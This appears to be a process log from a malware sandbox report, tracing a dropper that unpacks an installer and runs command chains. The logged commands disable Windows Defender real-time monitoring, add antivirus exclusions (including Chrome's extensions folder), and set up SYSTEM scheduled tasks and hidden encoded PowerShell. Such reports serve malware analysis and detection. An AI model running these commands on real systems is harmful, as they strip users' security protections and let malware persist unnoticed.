PID 2636 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2636 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2808 wrote to memory of 2512 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe

"C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe"

C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe

.\Install.exe /XGAZPdidZSkQ "525403" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bcicWGWSPuqTxjDSpV" /SC once /ST 23:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe\" Yw /XpcdidNBqz 525403 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bcicWGWSPuqTxjDSpV"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bcicWGWSPuqTxjDSpV

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bcicWGWSPuqTxjDSpV

C:\Windows\system32\taskeng.exe

taskeng.exe {676C2B5A-17EE-415A-948B-5425176AC997} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe

C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe Yw /XpcdidNBqz 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gYNZqWyid" /SC once /ST 21:40:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gYNZqWyid"

C:\Windows\system32\taskeng.exe

taskeng.exe {FBAF7CA6-613E-466E-A68D-9DCD55614271} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gYNZqWyid"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gSPBnLVfc" /SC once /ST 00:22:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gSPBnLVfc"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gSPBnLVfc"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\HKomOEKiubDeyUja\euJOQCWp\LeZBFQdWNANKeYuy.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\HKomOEKiubDeyUja\euJOQCWp\LeZBFQdWNANKeYuy.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hkBthRLftwjEC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oGdIbQIKIHUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prAQyJMeU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zNBDoCPwUgCU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wpmocubwzvTKZWVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gFYhrjEMs" /SC once /ST 13:01:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gFYhrjEMs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gFYhrjEMs"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "emrEEeoVdUigmulhl" /SC once /ST 20:36:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe\" 4u /LOvzdidsh 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "emrEEeoVdUigmulhl"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 600

